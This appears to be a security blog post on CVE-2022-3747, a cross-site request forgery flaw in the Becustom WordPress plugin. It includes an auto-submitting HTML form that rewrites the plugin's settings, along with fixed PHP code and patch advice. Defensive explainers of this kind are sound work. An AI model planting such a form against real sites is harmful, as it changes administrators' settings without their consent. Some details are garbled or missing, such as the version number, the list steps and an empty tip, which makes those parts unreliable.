CVE CyberSecurity Database News

CVE-2022-3747 - Becustom WordPress Plugin Vulnerable to CSRF — What You Need to Know, with Exploit Details

Poster -

The security of WordPress websites is crucial, especially when plugins open doors for hackers if not properly coded. This post will give you clear, exclusive insight into vulnerability CVE-2022-3747—an actively used exploit targeting the popular Becustom plugin (versions up to and including 1..5.2) due to a Cross-Site Request Forgery (CSRF) flaw. Read on to understand what CSRF is, how this bug works, see the real exploit code, and discover how to protect your website.

What is CVE-2022-3747?

CVE-2022-3747 affects the Becustom plugin for WordPress. Simply put: Any site running this plugin at version 1..5.2 or below is open to attacks where settings can be changed without the admin's consent.

The root issue?  
When you save plugin settings in WordPress, there should be a special security token (called a "nonce") in the request. If the plugin doesn't check this token, then anyone can trick an admin into saving whatever settings they want.

Why is that bad?  
It means an attacker could, for instance, change the URL slugs for your theme, swap the listed author, or change the theme label—without ever logging in!

How the Vulnerability Works

The problem was that Becustom’s settings panel did not validate the nonce when saving options. So, if _any_ logged-in admin visits a malicious webpage (the attacker’s “trap”), a hidden request is sent to change plugin settings.

3. The page quietly sends a “POST” request to the WordPress backend, changing settings in Becustom—_using the admin’s own logged-in session_.

Real Exploit Example

Here’s a step-by-step breakdown with real code showing how this CSRF attack unfolds.

Example CSRF Exploit: Change Becustom Settings

<!-- Place this code on any attacker-controlled site -->
<form id="csrfForm" action="https://victimsite.com/wp-admin/admin.php?page=becustom_settings"; method="POST">
  <input type="hidden" name="betheme_url_slug" value="hacked-theme">
  <input type="hidden" name="replaced_theme_author" value="evil-hacker">
  <input type="hidden" name="betheme_label" value="Compromised!">
  <input type="hidden" name="action" value="save_settings">
</form>
<script>
window.onload = function() {
  document.getElementById('csrfForm').submit();
};
</script>

How it works:

The admin, while logged in, is tricked into visiting this page.

- The form silently submits a POST request to the vulnerable settings handler in Becustom (/wp-admin/admin.php?page=becustom_settings).
- Since nonce validation is missing, the admin's browser sends their session cookie, and the settings get changed without the admin knowing.

Impact and Real-World Risk

- Site Branding and SEO: URL slugs and theme labels can be swapped out, altering the site's look or even damaging SEO.

Credential Phishing: Attackers could set URLs that lead to phishing pages.

- Backdoor Injection: In some cases, plugin settings could be tricked to load harmful scripts or external files.
- Trust Loss: Your website’s display could change instantly, confusing visitors and harming trust.

Mitigation and Patch

The fix:  
The plugin developer should validate a nonce value with every settings change. Nonces are WordPress’s built-in anti-CSRF system.

A safe settings handler should look like this

// Vulnerable: No nonce check
if (isset($_POST['action']) && $_POST['action'] === 'save_settings') {
    // Save options...
}

// Fixed: Nonce check added
if (isset($_POST['action']) && $_POST['action'] === 'save_settings' && check_admin_referer('becustom_settings_nonce')) {
    // Save options...
}

If you run Becustom:

Update to the latest version immediately.

(Dev site: https://wordpress.org/plugins/becustom/)

If you can’t update, disable the plugin until a fix is available.

General tip:

References

- Wordfence Advisory
- NVD CVE Entry
- Official Plugin on WordPress.org
- About CSRF (OWASP)

Final Thoughts

CVE-2022-3747 is a classic case of a smart but simple attack, made possible by a small oversight in plugin coding. Keep your plugins updated, and don’t underestimate the risk of “just one click” when working as an admin.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 20:52:00 UTC